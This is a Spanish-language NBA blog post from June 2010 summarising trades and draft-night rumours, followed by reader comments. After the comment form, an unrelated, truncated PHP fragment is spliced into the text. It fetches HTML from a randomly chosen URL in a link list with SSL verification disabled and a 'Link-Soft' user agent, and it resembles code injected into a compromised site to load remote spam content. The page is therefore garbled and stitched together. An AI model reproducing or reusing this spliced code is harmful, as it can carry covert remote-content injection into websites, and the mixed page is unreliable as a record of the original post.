Últimas noticias y rumores antes del Draft

24 de June de 2010 por txusma

El draft de la NBA es uno de los momentos del año que más me gustan por la cantidad de rumores y noticias que se generan. Es algo parecido al último día de traspasos en el mes de Febrero pero multiplicado por 2. Este año no es una excepción y vamos llenos de rumores y traspasos confirmados. Vamos a intentar repasarlos:

Empezamos con los traspasos confirmados de los últimos días. El pasado jueves los Sixers enviaron a Samuel Dalembert a Sacramento a cambio de Andres Nocioni (y su contrato de más de 13 millones en 2 años) y Spencer Hawes. A priori parece un buen movimiento para ambos. Sacramento se hace con un pívot que puede complementarse bastante bien con Ladry o Thompson y que además puede ayudar a crecer a un Demarcus Cousins que ya se ve con la camiseta de los Kings. En Philadelphia abren hueco para Marresse Speights y se hace con otro pívot con teórico potencial pero que no ha acabado de explotar en Sacramento. Además no nos debería extrañar ver como Nocioni hace las maletas y se vuelve a Europa gracias a un BuyOut.

Otras que se han movido han sido los Bucks que se han hecho con los servicios de Corey Maggette a cambio de Dan Gadzuric (que acaba contrato la próxima temporada) y Charlie Bell. Milwaukee se hace con un buen jugador para cubrir la posible marcha de John Salmons pero con un contrato mastodóntico de 30 millones en 3 años. Además habrá que comprobar como se adapta Maggette al sistema de Scott Skiles situado a años luz del de Don Nelson.

Y finalmente los Heat rizan el rizo y traspasan a Daequan Cook, uno de los 3 jugadores que tenía contrato garantizado para el año que viene. Con él se va también la elección 18 de primera ronda a cambio de la número 32. Nadie puede tener más espacio salarial que los Heat este verano.

Y hablando de rumores hay para todos los gustos:

– El principal es la posibilidad de que Chris Paul sea traspasado. Se habla de Portland TrailBlazers, Orlando Magic (a cambio de Vince Carter y Nelson) o Memphis Grizzlies como posibles destinos.

– El español Rudy Fernandez es otro de los nombres que está en el disparadero y con bastante fuerza. La opción de que se vaya a los Raptors de Calderon junto con la elección 22 a cambio de la elección 13 está encima de la mesa y no acaba de ser desmentida. Rockets y Knicks también están interesados pero no han hecho ofertas parecidas a la franquicia canadiense.

Luol Deng podría acabar en los Clippers junto con la elección 17 a cambio del pick 8. Otro rumor sitúa a Deng en Orlando a cambio de Pietrus y Gortat.

– Los Pacers podrían hacerse con los servicios de Eric Maynor y las elecciones 18 y 21 de los Thunder a cambio de la número 10. ¿Para que? Pues parece ser que para elegir a Gordon Hayward.

– Los Celtics están a punto de llegar a un acuerdo con el pívot turco Semih Erden, procedente del Fenerbahce. También se rumorea que podrían estar ofreciendo a Kendrick Perkins y su pick 19 a cambio de un pick más alto para empezar a rejuvenecer la plantilla.

Ayer ya comentamos que los Nets podían elegir a Wes Johnson ya que se habían puesto como objetivo contratar a Carlos Boozer en el mercado de agentes libres. Hoy las informaciones son más confusas y las apuestas por que jugador elegirá New Jersey en esa tercera elección se reparten al 50% entre Johnson y Favors.

Chris Douglas-Roberts está a un pasito de convertirse en jugador de los Bucks.

– Wizards y Magic han comentado la posibilidad de intercambiar a Gilbert Arenas y Vince Carter. Nada serio, de momento.

– Los Nets podrían hacerse con una elección que rondaría la número 20 a cambio de Keyon Dooling, que mediante un BuyOut podría hacer ahorrar a su franquicia unos 3 millones de $.

– Durante un tiempo se comentó la posibilidad de que Al Jefferson y Zach Randolph fueran intercambiados. El rumor ya ha sido desmentido por ambas franqucias.

– Los Golden State tienen sobre la mesa una oferta por la cual se harían con los servicios de Kenyon Martin a cambio de Dan Gadzuric y Biedrins. De todas maneras hasta el 22 de Agosto el traspaso no podría llevarse a cabo.

– Ojito porque no está descartado que Michael Beasley sea traspasado durante la ceremonia del draft.

– Muchos GM opinan que podría cerrarse algún trade que involucrara alguna de las 5 primeras elecciones. La de los Nets y la de Minnessotta son las que tienen más números.

Ekpe Udoh le gana la partida a Greg Monroe y podría ser escogido por los Warriors con la sexta elección. En este caso los Pistons no dejarían caer mucho más al jugador de Georgetown.

– Los Cavs tienen ganas de hacerse con una buena ronda que les permita escoger a Eric Bledsoe.

– Los Hornets podrían vender la elección número 11 junto a James Posey o Julian Wright.

Comenta

9 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    La opción de Ekpe Udoh para GSW solo puede ser si sale Biedrins, si no es una estupidez.

    Hayward encaja en los Thunders, aunque para ellos lo primordial deberia ser hacerse con un anotador interior.

      Citar

  2. Txusma dice:
    #2

    La salida de Biedrins se produciria en el traspaso con los Nuggets. Todo cobra sentido. Por cierto, está confirmado que Don Nelson continúa?

      Citar

  3. Viva_Dirk dice:
    #3

    Pero desprenderse de Biedrins para conseguir a Martin es casi tan tonto como elegir a Udoh teniendo a Biedrins ¿no? Creo que se complican mucho cuando pueden elegir a Monroe, aunque claro yo confio mas en el que la mayoría, incluso podrian elegir a Davis que también es un buen complemento para Biedrins.

      Citar

  4. Jona dice:
    #4

    Salmons ha salido al mercado que no lo has puesto XD
    Vais a hacer directo del draft?
    Un saludo

      Citar

  5. Jona dice:
    #5

    Veis a griffin este año tbn ROY?

      Citar

  6. sergi237 dice:
    #6

    Hilo para ver el evento online?

      Citar

  7. TheDeerHunter dice:
    #7

    Pues como ya se decía los Blazers han largado a Pritchard (¡qué gran decisión de futuro!!!)

    Los Bulls han regalado a Hinrich y una primera ronda a los Wizards para liberar salario a saco.

    Rasheed se retira…

    Y muy pocas noticias inesperadas en la noche del draft. Los 5 primeros puestos los clavó Txus…

      Citar

  8. Txusma dice:
    #8

    Dadme tiempo y después de comer publico un resumillo de la noche del draft.

      Citar

  9. Vader dice:
    #9

    Muchas gracias por toda la información!! Sois los mejores!! 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>